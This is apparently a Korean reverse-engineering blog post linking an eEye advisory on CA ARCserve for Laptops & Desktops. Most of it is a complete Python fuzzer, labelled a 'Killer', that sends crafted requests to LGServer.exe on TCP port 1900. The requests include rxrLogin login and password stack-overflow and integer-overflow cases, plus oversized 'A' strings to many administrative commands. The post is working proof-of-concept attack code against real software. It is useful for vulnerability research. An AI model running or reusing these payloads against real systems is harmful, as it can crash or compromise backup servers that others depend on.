Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops

리버스 엔지니어링 2007.10.22 11:31

아주 오래전 우연히 발견한 버그...
http://research.eeye.com/html/advisories/published/AD20070920.html

거의 일 년이 다 되어서 포스팅된 듯하다.
간단히 퍼저를 만들어 보자면 다음과 같다.

#CA BrightStor LGServer.exe Fuzzer
import os
import sys
import socket
import re
import time

def MakeCommandStr(command,arguments):
  """Build one request string for the TCP/1900 service this script talks to.

  Layout: a 10-digit, zero-padded decimal length prefix, then the body,
  where the body is the command name followed by each argument glued on
  with a "~~" separator.  Arguments go through str(), so ints are fine.
  The prefix counts only the body, not itself.
  """
  joined_args = "".join("~~" + str(arg) for arg in arguments)
  body = command + joined_args
  length_prefix = "%.10d" % len(body)
  return length_prefix + body

def FuzzyCommand(target,command_info):
 """Send one request whose single argument is 3000 'A's and print the reply.

 target       -- host to connect to (TCP port 1900, 3-second socket timeout)
 command_info -- sequence whose first item is the command name; the rest
                 is ignored
 Not referenced by the __main__ menu below; the 'Fuzzying' case of
 SendRXRequests does the same kind of request.
 """
 verbose=1
 conn=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 conn.settimeout(3)
 conn.connect((target, 1900))
 request=MakeCommandStr(command_info[0],["A"*3000])
 if verbose:
  print "="*80
  print "Sending: ",request
 conn.send(request)
 # Only the first 1024 bytes of the reply are read.
 reply=conn.recv(1024)
 if verbose:
  print "Got: ",reply
  print "\n\n"
 conn.close()

def SendRXRequests(target,method='Passwd Integer Overflow',Command="",argument_list=None):
 """Connect to target:1900 and replay the request sequence of one test case.

 method        -- test-case name (see the table below); an unknown name
                  opens and closes the connection without sending anything
 Command       -- command name, used only by the 'Fuzzying' case
 argument_list -- argument list, used only by the 'Fuzzying' case
 Every request is printed, written to the socket, and the first 1024
 bytes of the reply are printed.  Socket timeout is 10 seconds.
 """
 conn=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 conn.settimeout(10)
 conn.connect((target, 1900))

 # The login cases send two writes: a length-prefixed rxrLogin record
 # whose second argument is a declared length, then a bare second write
 # that the author calls passwd_str.  The 34-hex-digit value below is the
 # author's well-formed sample; what it encodes is not documented here.
 sample_passwd="7631F40AA4F38B3007EBA24153F08EDB02"
 long_passwd="A"*4*5000+"02"
 cases={
  'Login Overflow':[
   MakeCommandStr("rxrLogin",["administrator"+"A"*1000,len(sample_passwd)]),
   sample_passwd],
  'Passwd Integer Overflow':[
   MakeCommandStr("rxrLogin",["administrator","18"]),
   "000000000000000000"],
  'Passwd Test':[
   MakeCommandStr("rxrLogin",["administrator",str(len(sample_passwd))]),
   sample_passwd],
  'Passwd Stack Overflow':[
   MakeCommandStr("rxrLogin",["administrator",str(len(long_passwd))]),
   long_passwd],
  'Passwd Length Integer Overflow':[
   #Not working well
   MakeCommandStr("rxrLogin",["administrator",0xffffffff]),
   "AAAA"],
 }
 if method=='Fuzzying':
  packets=[MakeCommandStr(Command,argument_list)]
 else:
  packets=cases.get(method,[])

 for request in packets:
  print "="*80
  print "Sending: ",request
  conn.send(request)
  reply = conn.recv(1024)
  print "Got: ",reply
  print "\n\n"

 conn.close()

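if __name__ == '__main__':
 try:
  target = sys.argv[1]
 except IndexError:
  print 'Usage: %s <target>' % sys.argv[0]
  sys.exit(-1)

 # Each entry: [method name for SendRXRequests, command, argument list].
 # Only the 'Fuzzying' entries use the last two fields.
 Methods=[]
 Methods.append(['Login Overflow','',[]])
 Methods.append(['Passwd Stack Overflow','',[]])
 Methods.append(['Passwd Integer Overflow','',[]])
 #Methods.append(['Passwd Length Integer Overflow','',[]])
 Methods.append(['Fuzzying',"rxsClearPassword",["A"*3000]])
 Methods.append(['Fuzzying',"rxsSetActive",["A"*3000]])
 Methods.append(['Fuzzying',"rxsRenameUser",["A"*3000,"A"*3000]])
 Methods.append(['Fuzzying',"rxsDeleteUser",["A"*3000]])
 Methods.append(['Fuzzying',"rxsSetProtected",["A"*3000,"A"*3000]])
 Methods.append(['Fuzzying',"rxsSetupRestoreUser",["A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000,"A"*3000]])
 Methods.append(['Fuzzying',"rxsDeleteFile",["A"*3000]])
 Methods.append(['Fuzzying',"rxcReadBackupSetList",["A"*3000]])
 Methods.append(['Fuzzying',"rxcCriticalSection",["A"*3000]])
 Methods.append(['Fuzzying',"rxsGetUserInfo",["A"*3000]])

 while 1:
  print '='*50
  print 'BrightStor ARCserve Backup for Laptops and Desktops Killer:'
  print 'CA BrightStor LGServer.exe Fuzzer'
  print ''
  # 'kind' rather than 'type' so the builtin is not shadowed.
  for number,[kind,func,arg] in enumerate(Methods):
   print number+1,kind,func
  print ''
  print 0,'Exit'
  print ''
  print ''

  # raw_input() returns the typed text; the Python 2 input() it replaces
  # eval()s the text as an expression, which is never wanted for a menu.
  choice=raw_input("Which method do you want?")
  try:
   method_number=int(choice)
  except ValueError:
   print 'Please enter a number between 0 and %d' % len(Methods)
   continue
  print method_number
  if method_number==0:
   break
  # The old bare except hid out-of-range picks; reject them explicitly.
  if not 1<=method_number<=len(Methods):
   print 'No such method:',method_number
   continue

  method,command,args=Methods[method_number-1]
  try:
   SendRXRequests(
    target,
    method=method,
    Command=command,
    argument_list=args)
  except (socket.error,socket.timeout):
   # A refused, reset or timed-out connection is a normal outcome for
   # this tool (e.g. the service stopped answering); report it and
   # return to the menu instead of silently swallowing it.
   print 'Socket error while talking to',target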

